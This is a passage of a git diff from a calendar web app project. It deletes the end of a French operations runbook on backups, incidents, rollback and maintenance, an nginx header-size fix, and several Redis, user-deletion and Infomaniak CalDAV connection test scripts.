Analytics -- Vérifier: - - Taux d'erreur (< 1%) - - Temps de réponse (< 500ms) - - Trafic normal - -### Tâches hebdomadaires - -#### Sauvegarde de la base de données - -```bash -#!/bin/bash -# scripts/backup-db.sh - -BACKUP_DIR="/opt/neah/backups" -DATE=$(date +%Y%m%d_%H%M%S) -BACKUP_FILE="$BACKUP_DIR/backup_$DATE.sql.gz" - -mkdir -p "$BACKUP_DIR" - -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db | gzip > "$BACKUP_FILE" - -# Garder uniquement les 7 derniers backups -ls -t $BACKUP_DIR/backup_*.sql.gz | tail -n +8 | xargs rm -f - -echo "Backup créé: $BACKUP_FILE" -``` - -**Automatisation avec cron:** - -```bash -# Ajouter à crontab (crontab -e) -0 2 * * * /opt/neah/scripts/backup-db.sh >> /var/log/neah-backup.log 2>&1 -``` - -#### Nettoyage des logs - -```bash -# Nettoyer les anciens logs Docker (garder 7 jours) -docker system prune -f --filter "until=168h" -``` - ---- - -## Incidents - -### Procédure générale - -1. **Identifier le problème** - - Consulter les logs Vercel - - Vérifier l'endpoint `/api/health` - - Vérifier les logs PostgreSQL/Redis - -2. **Évaluer l'impact** - - Nombre d'utilisateurs affectés - - Fonctionnalités impactées - - Criticité (P1, P2, P3) - -3. **Contenir le problème** - - Rollback si nécessaire (voir section Rollback) - - Désactiver les fonctionnalités problématiques - - Communiquer avec les utilisateurs - -4. **Résoudre** - - Corriger le problème - - Tester en staging - - Déployer en production - -5. **Post-mortem** - - Documenter l'incident - - Identifier les causes racines - - Mettre en place des mesures préventives - -### Scénarios courants - -#### Scénario 1: Application inaccessible (503) - -**Symptômes:** -- Erreur 503 sur toutes les pages -- Health check échoue - -**Actions:** - -1. Vérifier Vercel Dashboard → Deployments -2. Vérifier les logs Vercel -3. Vérifier la connexion à PostgreSQL: - -```bash -# Tester la connexion -psql $DATABASE_URL -c "SELECT 1;" -``` - -4. Vérifier les variables d'environnement dans Vercel -5. Si problème persistant, rollback vers version précédente - -#### Scénario 2: Erreurs de base de données - -**Symptômes:** -- Erreurs "Connection refused" ou "Connection timeout" -- Health check indique `database: error` - -**Actions:** - -1. Vérifier l'état du conteneur PostgreSQL: - -```bash -docker ps | grep neah-postgres-prod -docker logs neah-postgres-prod --tail 50 -``` - -2. Vérifier les ressources: - -```bash -docker stats neah-postgres-prod -``` - -3. Redémarrer si nécessaire: - -```bash -docker restart neah-postgres-prod -``` - -4. Vérifier la connexion après redémarrage - -#### Scénario 3: Performance dégradée - -**Symptômes:** -- Temps de réponse élevés -- Timeouts fréquents - -**Actions:** - -1. Identifier les requêtes lentes: - -```sql --- Requêtes les plus lentes -SELECT - query, - calls, - mean_exec_time, - max_exec_time -FROM pg_stat_statements -ORDER BY mean_exec_time DESC -LIMIT 10; -``` - -2. Vérifier les index manquants: - -```sql --- Tables sans index -SELECT - schemaname, - tablename, - attname, - n_distinct, - correlation -FROM pg_stats -WHERE schemaname = 'public' - AND n_distinct > 100 - AND correlation < 0.1; -``` - -3. Optimiser les requêtes ou ajouter des index - -4. Vérifier l'utilisation de Redis (cache) - -#### Scénario 4: Erreurs d'authentification Keycloak - -**Symptômes:** -- Utilisateurs ne peuvent pas se connecter -- Erreurs "Invalid token" ou "Authentication failed" - -**Actions:** - -1. Vérifier la configuration Keycloak dans Vercel -2. Vérifier que Keycloak est accessible: - -```bash -curl https://keycloak.example.com/realms/neah/.well-known/openid-configuration -``` - -3. Vérifier les tokens dans les logs -4. Contacter l'administrateur Keycloak si nécessaire - ---- - -## Rollback - -### Rollback Vercel - -#### Méthode 1: Via Dashboard (Recommandé) - -1. Aller dans Vercel Dashboard → Deployments -2. Trouver le déploiement précédent (stable) -3. Cliquer sur "..." → "Promote to Production" -4. Confirmer le rollback - -#### Méthode 2: Via CLI - -```bash -# Lister les déploiements -vercel ls - -# Rollback vers un déploiement spécifique -vercel rollback [deployment-url] -``` - -### Rollback de migration Prisma - -**ATTENTION:** Les rollbacks de migration peuvent être destructifs. Toujours tester en staging d'abord. - -#### Méthode 1: Migration de rollback - -Si une migration de rollback existe: - -```bash -export DATABASE_URL="postgresql://..." -npx prisma migrate resolve --rolled-back [migration-name] -npx prisma migrate deploy -``` - -#### Méthode 2: Restauration depuis sauvegarde - -```bash -# Arrêter l'application si nécessaire -# Restaurer la sauvegarde -cat backup_20240112_120000.sql | docker exec -i neah-postgres-prod psql -U neah_prod_user calendar_db - -# OU avec compression -gunzip < backup_20240112_120000.sql.gz | docker exec -i neah-postgres-prod psql -U neah_prod_user calendar_db - -# Vérifier l'intégrité -docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c "SELECT COUNT(*) FROM \"User\";" -``` - -### Procédure complète de rollback - -1. **Évaluer l'impact** - - Identifier les changements à annuler - - Vérifier les dépendances - -2. **Sauvegarder l'état actuel** - -```bash -# Sauvegarde avant rollback -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db > backup_before_rollback_$(date +%Y%m%d_%H%M%S).sql -``` - -3. **Rollback Vercel** (voir ci-dessus) - -4. **Rollback base de données** (si nécessaire) - -5. **Vérifier** - -```bash -# Tester l'endpoint de santé -curl https://votre-domaine.vercel.app/api/health - -# Tester les fonctionnalités critiques -``` - -6. **Communiquer** - -- Informer l'équipe du rollback -- Documenter la raison du rollback -- Planifier la correction du problème - ---- - -## Maintenance - -### Maintenance planifiée - -#### Mise à jour des dépendances - -```bash -# Vérifier les mises à jour -npm outdated - -# Mettre à jour (une dépendance à la fois) -npm update [package-name] - -# Tester en local -npm run build -npm run dev - -# Tester en staging avant production -``` - -#### Mise à jour PostgreSQL - -```bash -# Arrêter le conteneur -docker stop neah-postgres-prod - -# Sauvegarder -docker exec neah-postgres-prod pg_dump -U neah_prod_user calendar_db > backup_before_upgrade.sql - -# Mettre à jour l'image dans docker-compose.prod.yml -# postgres:15-alpine → postgres:16-alpine - -# Redémarrer -docker-compose -f docker-compose.prod.yml up -d db - -# Vérifier -docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c "SELECT version();" -``` - -#### Nettoyage de la base de données - -```sql --- Analyser les tables -ANALYZE; - --- VACUUM (nettoyage) -VACUUM ANALYZE; - --- Vérifier les tables orphelines -SELECT - schemaname, - tablename, - pg_size_pretty(pg_total_relation_size(schemaname||'.'||tablename)) AS size -FROM pg_tables -WHERE schemaname = 'public' -ORDER BY pg_total_relation_size(schemaname||'.'||tablename) DESC; -``` - -### Maintenance d'urgence - -#### Redémarrage des services - -```bash -# Redémarrer PostgreSQL -docker restart neah-postgres-prod - -# Redémarrer Redis -docker restart neah-redis-prod - -# Redémarrer tous les services -docker-compose -f docker-compose.prod.yml restart -``` - -#### Libération d'espace disque - -```bash -# Vérifier l'espace disque -df -h - -# Nettoyer les images Docker non utilisées -docker image prune -a - -# Nettoyer les volumes non utilisés -docker volume prune - -# Nettoyer les anciens logs -journalctl --vacuum-time=7d -``` - ---- - -## Contacts - -### Équipe Neah - -- **DevOps**: [email] -- **Développement**: [email] -- **Support**: [email] - -### Services externes - -- **Vercel Support**: https://vercel.com/support -- **Keycloak Admin**: [contact] -- **PostgreSQL**: [contact serveur] - -### Escalade - -1. **Niveau 1**: Équipe Neah -2. **Niveau 2**: Administrateur système -3. **Niveau 3**: Direction technique - ---- - -## Annexes - -### Commandes utiles - -```bash -# Vérifier les logs en temps réel -vercel logs --follow - -# Vérifier l'état des migrations -npx prisma migrate status - -# Tester la connexion PostgreSQL -psql $DATABASE_URL -c "SELECT version();" - -# Statistiques PostgreSQL -docker exec neah-postgres-prod psql -U neah_prod_user -d calendar_db -c " -SELECT - datname, - numbackends, - xact_commit, - xact_rollback, - blks_read, - blks_hit -FROM pg_stat_database -WHERE datname = 'calendar_db'; -" - -# Statistiques Redis -docker exec neah-redis-prod redis-cli INFO stats -``` - -### Checklist de déploiement - -- [ ] Migrations testées en staging -- [ ] Variables d'environnement à jour -- [ ] Build local réussi -- [ ] Sauvegarde de la base de données -- [ ] Migrations appliquées -- [ ] Déploiement Vercel réussi -- [ ] Health check OK -- [ ] Tests fonctionnels passés -- [ ] Logs vérifiés (pas d'erreurs) - -### Checklist de rollback - -- [ ] Sauvegarde avant rollback créée -- [ ] Déploiement précédent identifié -- [ ] Rollback Vercel effectué -- [ ] Rollback base de données (si nécessaire) -- [ ] Health check OK -- [ ] Tests fonctionnels passés -- [ ] Équipe informée -- [ ] Problème documenté diff --git a/index.js b/index.js deleted file mode 100644 index e1d1274..0000000 --- a/index.js +++ /dev/null @@ -1,2 +0,0 @@ -// Main entry point for Electron app -require('./electron/main'); \ No newline at end of file diff --git a/logo.png b/logo.png deleted file mode 100644 index 26a8c68..0000000 Binary files a/logo.png and /dev/null differ diff --git a/nginx-config-fix.conf b/nginx-config-fix.conf deleted file mode 100644 index f4f7e20..0000000 --- a/nginx-config-fix.conf +++ /dev/null @@ -1,33 +0,0 @@ -# Configuration Nginx pour corriger l'erreur "upstream sent too big header" -# À ajouter dans votre configuration Nginx pour hub.slm-lab.net - -server { - # ... votre config existante ... - - # ============================================ - # FIX: Augmenter la limite des headers - # ============================================ - # Ces directives augmentent la taille maximale des headers - # pour permettre les gros cookies NextAuth (JWT avec tokens Keycloak) - - # Taille des buffers pour les headers - proxy_buffer_size 16k; - proxy_buffers 8 16k; - proxy_busy_buffers_size 32k; - - # Limite pour les gros headers clients (et réponses) - large_client_header_buffers 4 32k; - - # Hash tables pour les headers (optionnel mais recommandé) - proxy_headers_hash_max_size 512; - proxy_headers_hash_bucket_size 128; - - # Timeouts (pour éviter les timeouts pendant le traitement) - proxy_connect_timeout 60s; - proxy_send_timeout 60s; - proxy_read_timeout 60s; - - # ... reste de votre config ... -} - - diff --git a/package.json b/package.json index 4ace3e2..55f4f69 100644 --- a/package.json +++ b/package.json @@ -2,7 +2,6 @@ "name": "neah", "version": "0.1.0", "private": true, - "main": "index.js", "description": "Neah Web Application", "author": "Neah Team", "scripts": { diff --git a/scripts/test-redis-env.js b/scripts/test-redis-env.js deleted file mode 100644 index aa715dc..0000000 --- a/scripts/test-redis-env.js +++ /dev/null @@ -1,45 +0,0 @@ -#!/usr/bin/env node -require('dotenv').config(); - -const Redis = require('ioredis'); - -console.log('Redis configuration from environment:'); -console.log('- Host:', process.env.REDIS_HOST); -console.log('- Port:', process.env.REDIS_PORT); -console.log('- Password:', process.env.REDIS_PASSWORD ? '******** (set)' : '(not set)'); - -const redis = new Redis({ - host: process.env.REDIS_HOST, - port: process.env.REDIS_PORT ? parseInt(process.env.REDIS_PORT) : undefined, - password: process.env.REDIS_PASSWORD, - maxRetriesPerRequest: 3, - retryStrategy: (times) => Math.min(times * 100, 3000) -}); - -redis.on('connect', () => { - console.log('✅ Connected to Redis successfully!'); - - // Test a simple operation - redis.set('test-key', 'Test value from environment test') - .then(() => redis.get('test-key')) - .then((value) => { - console.log('✅ Successfully set and retrieved a test key:', value); - redis.quit(); - }) - .catch((err) => { - console.error('❌ Error during Redis operations:', err); - redis.quit(); - process.exit(1); - }); -}); - -redis.on('error', (err) => { - console.error('❌ Redis connection error:', err); - process.exit(1); -}); - -// Add a timeout to avoid hanging indefinitely -setTimeout(() => { - console.error('❌ Connection timeout'); - process.exit(1); -}, 5000); \ No newline at end of file diff --git a/scripts/test-redis.js b/scripts/test-redis.js deleted file mode 100644 index 9d008ed..0000000 --- a/scripts/test-redis.js +++ /dev/null @@ -1,68 +0,0 @@ -#!/usr/bin/env node - -const Redis = require('ioredis'); -const dotenv = require('dotenv'); - -// Load environment variables -dotenv.config({ path: '.env.local' }); - -const redisUrl = process.env.REDIS_URL || 'redis://:mySecretPassword@localhost:6379'; - -// Connect to Redis -const redis = new Redis(redisUrl, { - retryStrategy: (times) => { - const delay = Math.min(times * 50, 2000); - return delay; - } -}); - -// Test functions -async function testRedisConnection() { - try { - // Test basic connection - console.log('Testing Redis connection...'); - await redis.ping(); - console.log('✅ Redis connection successful!'); - - // Test setting a key - console.log('\nTesting setting a key...'); - await redis.set('test-key', 'Hello from Redis test script'); - console.log('✅ Successfully set test-key'); - - // Test getting a key - console.log('\nTesting getting a key...'); - const value = await redis.get('test-key'); - console.log(`✅ Successfully retrieved test-key: "${value}"`); - - // Test expiry - console.log('\nTesting key expiration...'); - await redis.set('expiring-key', 'This will expire in 5 seconds', 'EX', 5); - console.log('✅ Set key with 5 second expiration'); - console.log('Waiting for key to expire...'); - - // Wait for expiration - await new Promise(resolve => setTimeout(resolve, 6000)); - - const expiredValue = await redis.get('expiring-key'); - if (expiredValue === null) { - console.log('✅ Key successfully expired'); - } else { - console.log('❌ Key did not expire as expected'); - } - - // Clean up - console.log('\nCleaning up...'); - await redis.del('test-key'); - console.log('✅ Removed test keys'); - - console.log('\n🎉 All Redis tests passed!'); - } catch (error) { - console.error('❌ Redis test failed:', error); - } finally { - // Close connection - redis.disconnect(); - } -} - -// Run the test -testRedisConnection(); \ No newline at end of file diff --git a/scripts/test-user-deletion.js b/scripts/test-user-deletion.js deleted file mode 100644 index 5b80504..0000000 --- a/scripts/test-user-deletion.js +++ /dev/null @@ -1,273 +0,0 @@ -/** - * Test script for verifying user deletion across all integrated systems - * - * This script creates a test user with mediation role, verifies it exists in all systems, - * then deletes it and verifies deletion in all systems. - * - * Usage: node scripts/test-user-deletion.js - */ - -require('dotenv').config(); -const fetch = require('node-fetch'); - -// Test user configuration -const TEST_USER = { - username: `test-user-${Date.now()}`, - firstName: 'Test', - lastName: 'User', - email: `test-user-${Date.now()}@example.com`, - password: 'password123', - roles: ['mediation'] // Using mediation role which should be created in Dolibarr -}; - -// Configuration from environment variables -const config = { - keycloak: { - baseUrl: process.env.KEYCLOAK_BASE_URL, - realm: process.env.KEYCLOAK_REALM, - clientId: process.env.KEYCLOAK_CLIENT_ID, - clientSecret: process.env.KEYCLOAK_CLIENT_SECRET - }, - leantime: { - apiUrl: 'https://agilite.slm-lab.net/api/jsonrpc', - apiKey: process.env.LEANTIME_TOKEN - }, - dolibarr: { - apiUrl: process.env.DOLIBARR_API_URL, - apiKey: process.env.DOLIBARR_API_KEY - }, - nextAuthUrl: process.env.NEXTAUTH_URL || 'http://localhost:3000' -}; - -// Helper to get admin token for Keycloak operations -async function getKeycloakAdminToken() { - const response = await fetch( - `${config.keycloak.baseUrl}/realms/${config.keycloak.realm}/protocol/openid-connect/token`, - { - method: 'POST', - headers: { - 'Content-Type': 'application/x-www-form-urlencoded', - }, - body: new URLSearchParams({ - grant_type: 'client_credentials', - client_id: config.keycloak.clientId, - client_secret: config.keycloak.clientSecret, - }), - } - ); - - const data = await response.json(); - if (!response.ok || !data.access_token) { - throw new Error('Failed to get Keycloak admin token'); - } - - return data.access_token; -} - -// Create a test user in all systems via the API -async function createTestUser() { - console.log(`Creating test user: ${TEST_USER.username} (${TEST_USER.email})`); - - const response = await fetch(`${config.nextAuthUrl}/api/users`, { - method: 'POST', - headers: { - 'Content-Type': 'application/json', - }, - body: JSON.stringify(TEST_USER), - }); - - if (!response.ok) { - const error = await response.json(); - throw new Error(`Failed to create test user: ${JSON.stringify(error)}`); - } - - const data = await response.json(); - console.log('User created successfully:', data); - return data.user; -} - -// Check if user exists in Keycloak -async function checkKeycloakUser(userId) { - console.log(`Checking if user exists in Keycloak (ID: ${userId})`); - const token = await getKeycloakAdminToken(); - - const response = await fetch( - `${config.keycloak.baseUrl}/admin/realms/${config.keycloak.realm}/users/${userId}`, - { - headers: { - Authorization: `Bearer ${token}`, - }, - } - ); - - if (response.status === 404) { - console.log('User not found in Keycloak'); - return false; - } - - if (!response.ok) { - console.error('Error checking Keycloak user:', await response.text()); - return null; // Error state - } - - console.log('User exists in Keycloak'); - return true; -} - -// Check if user exists in Leantime -async function checkLeantimeUser(email) { - console.log(`Checking if user exists in Leantime (Email: ${email})`); - - try { - const response = await fetch(config.leantime.apiUrl, { - method: 'POST', - headers: { - 'Content-Type': 'application/json', - 'X-API-Key': config.leantime.apiKey, - }, - body: JSON.stringify({ - method: 'leantime.rpc.Users.Users.getUserIdByEmail', - jsonrpc: '2.0', - id: 1, - params: { - email: email - } - }) - }); - - const data = await response.json(); - if (!response.ok || !data.result) { - console.log('User not found in Leantime'); - return false; - } - - console.log('User exists in Leantime'); - return true; - } catch (error) { - console.error('Error checking Leantime user:', error); - return null; // Error state - } -} - -// Check if user exists in Dolibarr -async function checkDolibarrUser(email) { - console.log(`Checking if user exists in Dolibarr (Email: ${email})`); - - try { - const apiUrl = config.dolibarr.apiUrl.endsWith('/') - ? config.dolibarr.apiUrl - : `${config.dolibarr.apiUrl}/`; - - const response = await fetch( - `${apiUrl}users?sortfield=t.rowid&sortorder=ASC&limit=1&sqlfilters=(t.email:=:'${encodeURIComponent(email)}')`, - { - method: 'GET', - headers: { - 'DOLAPIKEY': config.dolibarr.apiKey, - }, - } - ); - - if (!response.ok) { - console.error('Error response from Dolibarr:', await response.text()); - return null; // Error state - } - - const data = await response.json(); - if (!Array.isArray(data) || data.length === 0) { - console.log('User not found in Dolibarr'); - return false; - } - - console.log('User exists in Dolibarr with ID:', data[0].id); - return { exists: true, id: data[0].id }; - } catch (error) { - console.error('Error checking Dolibarr user:', error); - return null; // Error state - } -} - -// Delete user from all systems via the API -async function deleteTestUser(userId, email) { - console.log(`Deleting test user: ID=${userId}, Email=${email}`); - - const response = await fetch( - `${config.nextAuthUrl}/api/users?id=${userId}&email=${encodeURIComponent(email)}`, - { - method: 'DELETE', - } - ); - - if (!response.ok) { - const error = await response.json(); - throw new Error(`Failed to delete test user: ${JSON.stringify(error)}`); - } - - console.log('User deletion request successful'); - return await response.json(); -} - -// Main test function -async function runTest() { - try { - console.log('=== STARTING USER DELETION TEST ==='); - - // Step 1: Create a test user - console.log('\n=== Step 1: Creating test user ==='); - const createdUser = await createTestUser(); - console.log(`Test user created with ID: ${createdUser.id}`); - - // Wait a moment for systems to process - console.log('Waiting for systems to process...'); - await new Promise(resolve => setTimeout(resolve, 2000)); - - // Step 2: Verify user exists in all systems - console.log('\n=== Step 2: Verifying user exists in all systems ==='); - const keycloakExists = await checkKeycloakUser(createdUser.id); - const leantimeExists = await checkLeantimeUser(TEST_USER.email); - const dolibarrUser = await checkDolibarrUser(TEST_USER.email); - - if (keycloakExists === null || leantimeExists === null || dolibarrUser === null) { - throw new Error('Error checking user existence in integrated systems'); - } - - if (!keycloakExists || !leantimeExists || !dolibarrUser.exists) { - throw new Error('User not created in all systems properly'); - } - - console.log('User confirmed to exist in all integrated systems'); - - // Step 3: Delete the test user - console.log('\n=== Step 3: Deleting test user ==='); - await deleteTestUser(createdUser.id, TEST_USER.email); - - // Wait a moment for systems to process - console.log('Waiting for systems to process deletion...'); - await new Promise(resolve => setTimeout(resolve, 2000)); - - // Step 4: Verify user has been deleted from all systems - console.log('\n=== Step 4: Verifying user deletion from all systems ==='); - const keycloakDeleted = !(await checkKeycloakUser(createdUser.id)); - const leantimeDeleted = !(await checkLeantimeUser(TEST_USER.email)); - const dolibarrDeleted = !(await checkDolibarrUser(TEST_USER.email)).exists; - - console.log('\n=== TEST RESULTS ==='); - console.log(`Keycloak user deleted: ${keycloakDeleted ? 'YES' : 'NO'}`); - console.log(`Leantime user deleted: ${leantimeDeleted ? 'YES' : 'NO'}`); - console.log(`Dolibarr user deleted: ${dolibarrDeleted ? 'YES' : 'NO'}`); - - if (keycloakDeleted && leantimeDeleted && dolibarrDeleted) { - console.log('\n✅ TEST PASSED: User successfully deleted from all systems'); - } else { - console.log('\n❌ TEST FAILED: User not deleted from all systems'); - } - - } catch (error) { - console.error('\n❌ TEST ERROR:', error); - } - - console.log('\n=== TEST COMPLETED ==='); -} - -// Run the test -runTest(); \ No newline at end of file diff --git a/test-infomaniak-caldav-simple.sh b/test-infomaniak-caldav-simple.sh deleted file mode 100755 index 7bff5ce..0000000 --- a/test-infomaniak-caldav-simple.sh +++ /dev/null @@ -1,70 +0,0 @@ -#!/bin/bash - -# Script de test simple pour la connexion CalDAV Infomaniak -# Usage: ./test-infomaniak-caldav-simple.sh - -EMAIL="${1:-a.tmiri@icmaae.foundation}" -PASSWORD="${2}" - -if [ -z "$PASSWORD" ]; then - echo "❌ Usage: $0 " - echo "" - echo "Example:" - echo " $0 a.tmiri@icmaae.foundation 'your-password'" - exit 1 -fi - -BASE_URL="https://sync.infomaniak.com/caldav" - -echo "🔍 Test CalDAV Infomaniak" -echo "Email: $EMAIL" -echo "URL: $BASE_URL" -echo "" - -# Test PROPFIND (méthode principale utilisée par le code) -echo "📡 Test PROPFIND..." -HTTP_CODE=$(curl -s -o /tmp/caldav-response.xml -w "%{http_code}" \ - -X PROPFIND \ - -u "${EMAIL}:${PASSWORD}" \ - -H "Depth: 1" \ - -H "Content-Type: application/xml" \ - --data-binary ' - - - - - -' \ - "${BASE_URL}/") - -echo "HTTP Status: $HTTP_CODE" -echo "" - -if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "207" ]; then - echo "✅ SUCCESS - Connexion réussie!" - echo "" - echo "Calendriers trouvés:" - grep -o "[^<]*" /tmp/caldav-response.xml | sed 's/<[^>]*>//g' | nl - echo "" - echo "Réponse complète sauvegardée dans /tmp/caldav-response.xml" -elif [ "$HTTP_CODE" = "401" ]; then - echo "❌ ERREUR 401 - Non autorisé" - echo "" - echo "Causes possibles:" - echo " 1. Mot de passe incorrect" - echo " 2. 2FA activé - utilisez un mot de passe d'application" - echo " 3. Compte suspendu" - echo "" - echo "Pour générer un mot de passe d'application Infomaniak:" - echo " 1. Connectez-vous à https://config.infomaniak.com" - echo " 2. Allez dans 'Mon profil' > 'Mots de passe d'application'" - echo " 3. Générez un nouveau mot de passe pour 'CalDAV'" - echo " 4. Utilisez ce mot de passe dans votre compte email" -else - echo "❌ ERREUR HTTP $HTTP_CODE" - echo "" - echo "Réponse:" - cat /tmp/caldav-response.xml | head -20 -fi - -rm -f /tmp/caldav-response.xml diff --git a/test-infomaniak-caldav.js b/test-infomaniak-caldav.js deleted file mode 100644 index 494ac64..0000000 --- a/test-infomaniak-caldav.js +++ /dev/null @@ -1,142 +0,0 @@ -#!/usr/bin/env node - -/** - * Script de test pour la connexion CalDAV Infomaniak - * Usage: node test-infomaniak-caldav.js - */ - -const { createClient } = require('webdav'); - -const email = process.argv[2] || 'a.tmiri@icmaae.foundation'; -const password = process.argv[3]; - -if (!password) { - console.error('❌ Usage: node test-infomaniak-caldav.js '); - console.error(''); - console.error('Example:'); - console.error(' node test-infomaniak-caldav.js a.tmiri@icmaae.foundation "your-password"'); - process.exit(1); -} - -const baseUrl = 'https://sync.infomaniak.com/caldav'; - -console.log('🔍 Test CalDAV Infomaniak'); -console.log('Email:', email); -console.log('URL:', baseUrl); -console.log('Password length:', password.length); -console.log(''); - -async function testCalDAV() { - try { - console.log('📡 Création du client CalDAV...'); - const client = createClient(baseUrl, { - username: email, - password: password, - }); - - console.log('📡 Test PROPFIND sur la racine (/)...'); - const items = await client.getDirectoryContents('/'); - - console.log('✅ SUCCESS - Connexion réussie!'); - console.log(''); - console.log(`📅 ${items.length} élément(s) trouvé(s):`); - console.log(''); - - const calendars = items.filter(item => item.type === 'directory' && item.filename !== '/'); - - if (calendars.length === 0) { - console.log('⚠️ Aucun calendrier trouvé (seulement des fichiers)'); - } else { - console.log('Calendriers:'); - for (let i = 0; i < calendars.length; i++) { - const cal = calendars[i]; - console.log(` ${i + 1}. ${cal.basename || cal.filename}`); - console.log(` Chemin: ${cal.filename}`); - console.log(` Type: ${cal.type}`); - - // Essayer de récupérer les propriétés du calendrier - try { - const props = await client.customRequest(cal.filename, { - method: 'PROPFIND', - headers: { - Depth: '0', - 'Content-Type': 'application/xml', - }, - data: ` - - - - - -`, - }); - - // Parser le XML pour extraire le displayname - const displayNameMatch = props.data.match(/]*>([^<]+)<\/d:displayname>/i); - const colorMatch = props.data.match(/]*>([^<]+)<\/c:calendar-color>/i); - - if (displayNameMatch) { - console.log(` Nom: ${displayNameMatch[1]}`); - } - if (colorMatch) { - console.log(` Couleur: ${colorMatch[1]}`); - } - } catch (propError) { - console.log(` ⚠️ Impossible de récupérer les propriétés: ${propError.message}`); - } - console.log(''); - } - } - - console.log('=========================================='); - console.log('✅ La connexion CalDAV fonctionne correctement'); - console.log(' Si le code Node.js échoue, le problème est dans la bibliothèque webdav'); - console.log(' ou dans la configuration du client.'); - console.log('=========================================='); - - } catch (error) { - console.error('❌ ERREUR'); - console.error(''); - console.error('Type:', error.constructor.name); - console.error('Message:', error.message); - - if (error.status === 401 || error.response?.status === 401) { - console.error(''); - console.error('🔐 Erreur 401 - Non autorisé'); - console.error(''); - console.error('Causes possibles:'); - console.error(' 1. Mot de passe incorrect'); - console.error(' 2. 2FA activé - utilisez un mot de passe d\'application'); - console.error(' 3. Compte suspendu ou désactivé'); - console.error(' 4. Email incorrect'); - console.error(''); - console.error('Pour générer un mot de passe d\'application Infomaniak:'); - console.error(' 1. Connectez-vous à https://config.infomaniak.com'); - console.error(' 2. Allez dans "Mon profil" > "Mots de passe d\'application"'); - console.error(' 3. Générez un nouveau mot de passe pour "CalDAV"'); - console.error(' 4. Utilisez ce mot de passe dans votre compte email'); - } else { - console.error(''); - console.error('Détails de l\'erreur:'); - if (error.status) { - console.error(' Status:', error.status); - } - if (error.statusText) { - console.error(' Status Text:', error.statusText); - } - if (error.response) { - console.error(' Response Status:', error.response.status); - console.error(' Response Status Text:', error.response.statusText); - } - if (error.stack) { - console.error(''); - console.error('Stack trace:'); - console.error(error.stack.split('\n').slice(0, 5).join('\n')); - } - } - - process.exit(1); - } -} - -testCalDAV(); diff --git a/test-infomaniak-caldav.sh b/test-infomaniak-caldav.sh deleted file mode 100644 index 1295958..0000000 --- a/test-infomaniak-caldav.sh +++ /dev/null @@ -1,147 +0,0 @@ -#!/bin/bash - -# Script de test pour la connexion CalDAV Infomaniak -# Usage: ./test-infomaniak-caldav.sh - -EMAIL="${1:-a.tmiri@icmaae.foundation}" -PASSWORD="${2}" - -if [ -z "$PASSWORD" ]; then - echo "Usage: $0 " - echo "Example: $0 a.tmiri@icmaae.foundation 'your-password'" - exit 1 -fi - -BASE_URL="https://sync.infomaniak.com/caldav" - -echo "==========================================" -echo "Test de connexion CalDAV Infomaniak" -echo "==========================================" -echo "Email: $EMAIL" -echo "Base URL: $BASE_URL" -echo "Password length: ${#PASSWORD}" -echo "" - -# Test 1: PROPFIND sur la racine -echo "Test 1: PROPFIND sur la racine (/)" -echo "-----------------------------------" -RESPONSE=$(curl -s -w "\nHTTP_CODE:%{http_code}" \ - -X PROPFIND \ - -u "${EMAIL}:${PASSWORD}" \ - -H "Depth: 1" \ - -H "Content-Type: application/xml" \ - --data-binary ' - - - - - -' \ - "${BASE_URL}/") - -HTTP_CODE=$(echo "$RESPONSE" | grep -o "HTTP_CODE:[0-9]*" | cut -d: -f2) -BODY=$(echo "$RESPONSE" | sed '/HTTP_CODE:/d') - -echo "HTTP Status: $HTTP_CODE" -if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "207" ]; then - echo "✅ SUCCESS - Connexion réussie!" - echo "" - echo "Réponse:" - echo "$BODY" | head -50 -else - echo "❌ FAILED - Erreur HTTP $HTTP_CODE" - echo "" - echo "Réponse complète:" - echo "$BODY" -fi - -echo "" -echo "" - -# Test 2: OPTIONS pour vérifier les capacités -echo "Test 2: OPTIONS pour vérifier les capacités" -echo "--------------------------------------------" -RESPONSE2=$(curl -s -w "\nHTTP_CODE:%{http_code}" \ - -X OPTIONS \ - -u "${EMAIL}:${PASSWORD}" \ - "${BASE_URL}/") - -HTTP_CODE2=$(echo "$RESPONSE2" | grep -o "HTTP_CODE:[0-9]*" | cut -d: -f2) -BODY2=$(echo "$RESPONSE2" | sed '/HTTP_CODE:/d') - -echo "HTTP Status: $HTTP_CODE2" -if [ "$HTTP_CODE2" = "200" ]; then - echo "✅ SUCCESS" - echo "" - echo "Headers (capacités):" - curl -s -I -X OPTIONS \ - -u "${EMAIL}:${PASSWORD}" \ - "${BASE_URL}/" | grep -i "dav\|allow\|calendar" -else - echo "❌ FAILED - Erreur HTTP $HTTP_CODE2" -fi - -echo "" -echo "" - -# Test 3: GET sur la racine -echo "Test 3: GET sur la racine (/)" -echo "------------------------------" -RESPONSE3=$(curl -s -w "\nHTTP_CODE:%{http_code}" \ - -u "${EMAIL}:${PASSWORD}" \ - "${BASE_URL}/") - -HTTP_CODE3=$(echo "$RESPONSE3" | grep -o "HTTP_CODE:[0-9]*" | cut -d: -f2) -BODY3=$(echo "$RESPONSE3" | sed '/HTTP_CODE:/d') - -echo "HTTP Status: $HTTP_CODE3" -if [ "$HTTP_CODE3" = "200" ] || [ "$HTTP_CODE3" = "207" ]; then - echo "✅ SUCCESS" - echo "" - echo "Réponse:" - echo "$BODY3" | head -30 -else - echo "❌ FAILED - Erreur HTTP $HTTP_CODE3" -fi - -echo "" -echo "" - -# Test 4: Vérification avec verbose pour voir les headers d'authentification -echo "Test 4: Requête verbose (pour debug)" -echo "-------------------------------------" -echo "Commande curl complète:" -echo "curl -v -X PROPFIND -u \"${EMAIL}:***\" -H \"Depth: 1\" \"${BASE_URL}/\"" -echo "" -echo "Exécution (sans afficher le password):" -curl -v -X PROPFIND \ - -u "${EMAIL}:${PASSWORD}" \ - -H "Depth: 1" \ - -H "Content-Type: application/xml" \ - --data-binary ' - - - - -' \ - "${BASE_URL}/" 2>&1 | grep -E "(< HTTP|Authorization|WWW-Authenticate|401|200|207)" | head -20 - -echo "" -echo "==========================================" -echo "Résumé:" -echo "==========================================" -if [ "$HTTP_CODE" = "200" ] || [ "$HTTP_CODE" = "207" ]; then - echo "✅ La connexion CalDAV fonctionne correctement" - echo " Le problème pourrait être dans le code Node.js" -elif [ "$HTTP_CODE" = "401" ]; then - echo 